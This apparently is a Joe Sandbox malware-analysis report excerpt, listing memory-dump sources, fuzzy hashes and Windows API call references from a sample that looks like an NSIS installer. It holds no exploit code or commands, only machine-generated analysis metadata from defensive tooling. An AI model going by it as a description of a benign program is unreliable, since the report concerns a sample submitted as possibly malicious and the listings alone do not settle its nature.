                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 1638840714-813528018
                              • Opcode ID: d8afd28a0c3ee7a5ecc07d83f55fb30fbace4eef79b80df0a3b445219cdd2625
                              • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                              • Opcode Fuzzy Hash: d8afd28a0c3ee7a5ecc07d83f55fb30fbace4eef79b80df0a3b445219cdd2625
                              • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                              APIs
                              • DeleteFileA.KERNEL32(?,?,75A33410,75A32EE0,00000000), ref: 0040588A
                              • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058D2
                              • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058F3
                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 004058F9
                              • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,75A33410,75A32EE0,00000000), ref: 0040590A
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                              • FindClose.KERNEL32(00000000), ref: 004059C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 2035342205-1173974218
                              • Opcode ID: 3ebdef7a8bfe5bb7036cc40bba984425dda0d6b7b6891e5c0f59388fd5a4de97
                              • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                              • Opcode Fuzzy Hash: 3ebdef7a8bfe5bb7036cc40bba984425dda0d6b7b6891e5c0f59388fd5a4de97
                              • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                              • Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
                              • Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                              • Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 0040535D
                              • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                              • GetClientRect.USER32(?,?), ref: 004053A9
                              • GetSystemMetrics.USER32(00000002), ref: 004053B0
                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                              • ShowWindow.USER32(?,00000008), ref: 0040544C
                              • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                              • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                              • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                              • CreateThread.KERNEL32(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                              • CloseHandle.KERNEL32(00000000), ref: 004054D3
                              • ShowWindow.USER32(00000000), ref: 004054F6
                              • ShowWindow.USER32(?,00000008), ref: 004054FD
                              • ShowWindow.USER32(00000008), ref: 00405543
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                              • CreatePopupMenu.USER32 ref: 00405588
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                              • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                              • OpenClipboard.USER32(00000000), ref: 00405622
                              • EmptyClipboard.USER32 ref: 00405628
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                              • GlobalLock.KERNEL32(00000000), ref: 0040563B
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                              • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                              • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                              • CloseClipboard.USER32 ref: 00405679
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID: 0B
                              • API String ID: 590372296-4132856435
                              • Opcode ID: 3f3f8157529fe7dfee1cc0433fd35ac1c8f506144681312bbf4a5472d80bc8bd
                              • Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
                              • Opcode Fuzzy Hash: 3f3f8157529fe7dfee1cc0433fd35ac1c8f506144681312bbf4a5472d80bc8bd
                              • Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                              • ShowWindow.USER32(?), ref: 00403CDF
                              • DestroyWindow.USER32 ref: 00403CF3
                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                              • GetDlgItem.USER32(?,?), ref: 00403D30
                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                              • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                              • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                              • GetDlgItem.USER32(?,00000002), ref: 00403E03
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                              • GetDlgItem.USER32(?,00000003), ref: 00403F14
                              • ShowWindow.USER32(00000000,?), ref: 00403F35
                              • EnableWindow.USER32(?,?), ref: 00403F47
                              • EnableWindow.USER32(?,?), ref: 00403F62
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                              • EnableMenuItem.USER32(00000000), ref: 00403F7F
                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                              • lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00403FD4
                              • SetWindowTextA.USER32(?,00420D30), ref: 00403FE3
                              • ShowWindow.USER32(?,0000000A), ref: 00404117
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                              • String ID: 0B
                              • API String ID: 184305955-4132856435
                              • Opcode ID: 494e5d15f52d909de3728dffe2acfde06eca01d490e6fb77ff0f3207f2f85486
                              • Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
                              • Opcode Fuzzy Hash: 494e5d15f52d909de3728dffe2acfde06eca01d490e6fb77ff0f3207f2f85486
                              • Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D
                              APIs
                                • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                              • lstrcatA.KERNEL32(0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,75A33410,0042B400,0042A000,00000000), ref: 00403964
                              • lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,75A33410), ref: 004039D9
                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                              • GetFileAttributesA.KERNEL32(004236C0), ref: 004039F7
                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403A40
                                • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                              • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                              • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                              • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                              • RegisterClassA.USER32(00423EC0), ref: 00403B42
                              • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: .DEFAULT\Control Panel\International$.exe$0B$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                              • API String ID: 1975747703-610843794
                              • Opcode ID: c0b74264b80d684e05b9670c33d338dc849c687744dfa108ed2df9d331500c62
                              • Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
                              • Opcode Fuzzy Hash: c0b74264b80d684e05b9670c33d338dc849c687744dfa108ed2df9d331500c62
                              • Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D
                              APIs
                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                              • GetSysColor.USER32(?), ref: 00404371
                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                              • lstrlenA.KERNEL32(?), ref: 00404392
                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                              • GetDlgItem.USER32(?,0000040A), ref: 00404418
                              • SendMessageA.USER32(00000000), ref: 0040441B
                              • GetDlgItem.USER32(?,000003E8), ref: 00404446
                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                              • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                              • SetCursor.USER32(00000000), ref: 0040449E
                              • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                              • SetCursor.USER32(00000000), ref: 004044B7
                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: N$nB@
                              • API String ID: 3103080414-4167803745
                              • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                              • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                              • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                              • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                              • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                              • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                              • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 00404619
                              • SetWindowTextA.USER32(00000000,?), ref: 00404643
                              • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                              • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                              • lstrcmpiA.KERNEL32(004236C0,00420D30), ref: 00404731
                              • lstrcatA.KERNEL32(?,004236C0), ref: 0040473D
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,0042A000,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                • Part of subcall function 00406303: CharNextA.USER32(?,0042A000,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                • Part of subcall function 00406303: CharPrevA.USER32(?,?,75A33410,0042B400,00000000,004032E8,0042B400,0042B400,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                              • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                • Part of subcall function 00404981: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: 0B$A
                              • API String ID: 2624150263-373579336
                              • Opcode ID: dabeba3b97e2907f87f04c2d0dd353413e682be42e818b22754e0aedb349eabf
                              • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                              • Opcode Fuzzy Hash: dabeba3b97e2907f87f04c2d0dd353413e682be42e818b22754e0aedb349eabf
                              • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                              • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                              • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                              • wsprintfA.USER32 ref: 00405D7D
                              • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                              • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                              • GlobalFree.KERNEL32(00000000), ref: 00405E66
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                • Part of subcall function 00405C32: GetFileAttributesA.KERNEL32(00000003,00402DDB,0042BC00,80000000,00000003), ref: 00405C36
                                • Part of subcall function 00405C32: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]
                              • API String ID: 2171350718-1727408572
                              • Opcode ID: c723dcda6b53f61ccdafe327344b31b2963e039a378ed67f4dc0120c4ff23498
                              • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                              • Opcode Fuzzy Hash: c723dcda6b53f61ccdafe327344b31b2963e039a378ed67f4dc0120c4ff23498
                              • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                              APIs
                              • GetTickCount.KERNEL32 ref: 00402DAC
                              • GetModuleFileNameA.KERNEL32(00000000,0042BC00,00000400), ref: 00402DC8
                                • Part of subcall function 00405C32: GetFileAttributesA.KERNEL32(00000003,00402DDB,0042BC00,80000000,00000003), ref: 00405C36
                                • Part of subcall function 00405C32: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,0042AC00,0042AC00,0042BC00,0042BC00,80000000,00000003), ref: 00402E11
                              • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402F58
                              Strings
                              • soft, xrefs: 00402E88
                              • Error launching installer, xrefs: 00402DE8
                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
                              • Inst, xrefs: 00402E7F
                              • Null, xrefs: 00402E91
                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 2803837635-3016655952
                              • Opcode ID: 186828efae30a8a2c236a5659a586d8060acad418c34dac636486169236efce2
                              • Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
                              • Opcode Fuzzy Hash: 186828efae30a8a2c236a5659a586d8060acad418c34dac636486169236efce2
                              • Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C
                              APIs
                              • GetSystemDirectoryA.KERNEL32(004236C0,00000400), ref: 004061E6
                              • GetWindowsDirectoryA.KERNEL32(004236C0,00000400,?,00420510,00000000,004051F8,00420510,00000000), ref: 004061F9
                              • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,00420510,00000000,004051F8,00420510,00000000), ref: 00406235
                              • SHGetPathFromIDListA.SHELL32(00000000,004236C0), ref: 00406243
                              • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                              • lstrcatA.KERNEL32(004236C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                              • lstrlenA.KERNEL32(004236C0,?,00420510,00000000,004051F8,00420510,00000000,00000000,00000000,00000000), ref: 004062C5
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 004061B5
                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040626D
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 717251189-730719616
